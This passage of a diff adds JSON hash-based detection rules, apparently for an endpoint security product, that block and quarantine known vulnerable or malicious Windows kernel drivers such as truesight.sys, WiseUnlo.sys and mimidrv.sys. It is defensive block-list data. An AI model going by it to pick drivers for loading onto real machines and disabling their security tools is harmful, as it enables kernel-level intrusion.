+ "comment": "Vulnerable Kernel Driver (aka Black.sys) [https://www.loldrivers.io/drivers/4b047bb8-c605-4664-baed-25bb70e864a1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e96bafbc-d941-5f9a-8375-beb01ec155c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612974Z",
+ "creation_date": "2026-03-23T11:45:29.612976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "734b74798a680d2e534c14a033858c4081c7879af1f48037d9d5483aa27a7e90",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e96f5149-b3d7-5a25-b1fc-100855121a43",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616808Z",
+ "creation_date": "2026-03-23T11:45:29.616810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aef3985caa213c9e5e0a0d5e75a9a7918a92c08690b5a04a6b14d6372c2dd71c",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e97d5826-1ef7-5acd-ac82-805bd4006eb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976642Z",
+ "creation_date": "2026-03-23T11:45:29.976644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976650Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd66e893300e7e59a749fe4e1b1706f8ccb5ae140254def9f5a614648e2da36f",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e981b70e-d33f-5727-a247-eedc09afefdd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620072Z",
+ "creation_date": "2026-03-23T11:45:29.620074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33",
+ "comment": "Intel vulnerable drivers (aka semav6msr.sys and piddrv64.sys) [https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9891970-1b74-5879-8ef6-410e0bfe9146",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141612Z",
+ "creation_date": "2026-03-23T11:45:31.141614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40a9e2cd3755180f9b1ed21616ec9a8442d5618361a0a17b6332d1ae1bec5058",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e98a8bec-2318-552e-b78e-7ea8b59ef0ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819999Z",
+ "creation_date": "2026-03-23T11:45:31.820003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65799df3a3d3ba7f529daba403ee6c8f5240b6194822266a0fc8f439bb1fdd62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e98b5d01-ec84-5f96-b279-7761d63cb762",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160065Z",
+ "creation_date": "2026-03-23T11:45:31.160067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160072Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7f81fb6afd180e9005b0c8dd178181a296952aab5e3b56c21597924c957edaa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e99216f8-ddb9-58a5-97eb-5fc46a15dad3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976210Z",
+ "creation_date": "2026-03-23T11:45:29.976212Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e99e5531-9025-5a1b-a59c-96b250bf1eeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835085Z",
+ "creation_date": "2026-03-23T11:45:30.835088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8db11ff4f0fbcf58ad118aefcc186ea7b273eefa9b537eee1ec92f0231c44e30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9a9c7af-9563-5ecd-badb-3ddae8aad830",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829154Z",
+ "creation_date": "2026-03-23T11:45:31.829157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9103c9085a372f4e2a09da45ff210a8096b7dc0c404719504ebf74f009e5deb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9ac3a0a-e472-5549-9751-dd0c37185db5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822326Z",
+ "creation_date": "2026-03-23T11:45:31.822328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c827affab0c51c6388453fd855c304358a95e3b9fa4ca9101315169cde72d69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9b1fad4-f066-5e1f-adb4-50fdc9f69e93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982964Z",
+ "creation_date": "2026-03-23T11:45:29.982966Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "daf549a7080d384ba99d1b5bd2383dbb1aa640f7ea3a216df1f08981508155f5",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9b7835a-4ac1-5afb-8071-059bbc53e8a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477548Z",
+ "creation_date": "2026-03-23T11:45:31.477552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa76f8a295e5013e85b3c8de9b8a4e5ca6052fffcf119a4c0be03743bba8221d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9be632e-3671-57ba-ad85-dfd3b2c68f6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819262Z",
+ "creation_date": "2026-03-23T11:45:31.819264Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a532a1c1a6177ee75f189805855c15965e689140f2acc14ed4f81a8b82a9869",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9d591b1-63b1-5b02-b5e2-dff6e1d5c554",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147639Z",
+ "creation_date": "2026-03-23T11:45:31.147641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1821221fdd3984994974e6001eda4afbc6ef07e05206587a48cbd9b6d787f220",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9d7c94d-fd73-50d4-94d7-6d8792e69d05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148329Z",
+ "creation_date": "2026-03-23T11:45:31.148331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efc3fc8e98ffdc26239f584632c6c8c0ecdec9eb02e4e19ae126c153986bf5b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9e79f64-0c08-5f11-953f-b5f6812ffba2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464480Z",
+ "creation_date": "2026-03-23T11:45:30.464483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d42678df3917c37f44a1506307f1677b9a689efcf350b1acce7e6f64b514905",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9e812b3-1427-5331-a84b-a55e4de5673f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815763Z",
+ "creation_date": "2026-03-23T11:45:31.815766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f96fb7c3a57c6efeb394f119d6965cceb9c58ec395671d12787f48389c0d676",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9e9709e-0569-54b5-83e0-2ff5ae467c67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158935Z",
+ "creation_date": "2026-03-23T11:45:31.158937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158943Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cbcb6ed0338f536d264cd4e851f1e34a84e733cc4d60519c416142f0b5982c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9f0ab3a-6209-5be8-94e3-4e17f969d091",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152960Z",
+ "creation_date": "2026-03-23T11:45:31.152963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bd2dd16cd005368abcea9c6f457853ab46a153d058b909f135394d48a3e399f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9f3f13c-4d62-5364-86ec-f9858a7f1ef3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476468Z",
+ "creation_date": "2026-03-23T11:45:31.476471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1035795567d03236901340505b79a4dd1a7619dc22740a2f6a667ff53249248",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9f7f05a-8b8b-5cbd-9a45-7310d0336d63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982659Z",
+ "creation_date": "2026-03-23T11:45:29.982661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "448a507774886c1745beaa86cd0867d93f142f5d2b58d452c5a8250d93359779",
+ "comment": "Malicious Kernel Driver (aka wantd_5.sys) [https://www.loldrivers.io/drivers/3277cecc-f4b4-4a00-be01-9da83e013bcd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea04c9ef-ec1f-572e-8253-2c686726e25e",
